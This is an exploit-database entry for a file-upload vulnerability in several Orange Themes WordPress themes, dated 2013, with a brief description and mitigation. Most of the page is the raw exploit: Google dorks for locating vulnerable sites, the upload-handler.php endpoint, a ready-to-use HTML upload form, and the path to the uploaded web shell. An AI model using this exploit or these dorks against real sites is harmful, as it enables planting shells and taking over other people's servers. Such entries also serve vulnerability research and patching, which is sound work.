Wordpress Orange Themes CSRF File Upload Vulnerability

vendor:

Wordpress Orange Themes

by:

Jje Incovers

8,8

CVSS

HIGH

CSRF

352

CWE

Product Name: Wordpress Orange Themes

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Mozila, Chrome, Opera -> Windows & Linux

2013

WordPress Orange Themes CSRF File Upload Vulnerability

A Cross-Site Request Forgery (CSRF) vulnerability exists in the Orange Themes Wordpress themes. An attacker can exploit this vulnerability to upload arbitrary files to the web server, which can lead to remote code execution. The vulnerability exists due to insufficient validation of the uploaded file type. An attacker can send a malicious request to the upload-handler.php file, which will allow them to upload arbitrary files to the web server.

Mitigation:

Ensure that the web application validates the file type of the uploaded file before allowing it to be uploaded to the web server.

Source

Exploit-DB raw data:

#Title : Wordpress Orange Themes CSRF File Upload Vulnerability
#Author : Jje Incovers
#Date : 01/12/2013 - 17 November 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://www.orange-themes.com/
#Download : http://www.orange-themes.com/portfolio/
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
#Scanning Theme : [ Agritourismo , Forca , Grandis , Legatus , Reganto , Sportimo , Piccione , Bulteno , Coloris , Botanica , Project 10 , Pinword , Rockstar , Kernel , Bordeaux , Radial , Oxygen , Ray Of Light , Gadgetine ] -theme

#Dork : 
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"  

CSRF File Upload Vulnerability

Exploit & POC : 

http://site-target/wp-content/themes/rockstar-theme/functions/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php" method="post"> 
Your File: <input name="uploadfile" type="file" /><br /> 
<input type="submit" value="upload" /> 
</form> 


File Access :

http://site-target/wp-content/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/13/inc0vers.php

Note :
Script CSRF equate with dork you use

########################################
#Greetz : 0day-id.com | newbie-security.or.id | SANJUNGAN JIWA
#Thanks : Akira | Xie Log | - SANJUNGAN JIWA
########################################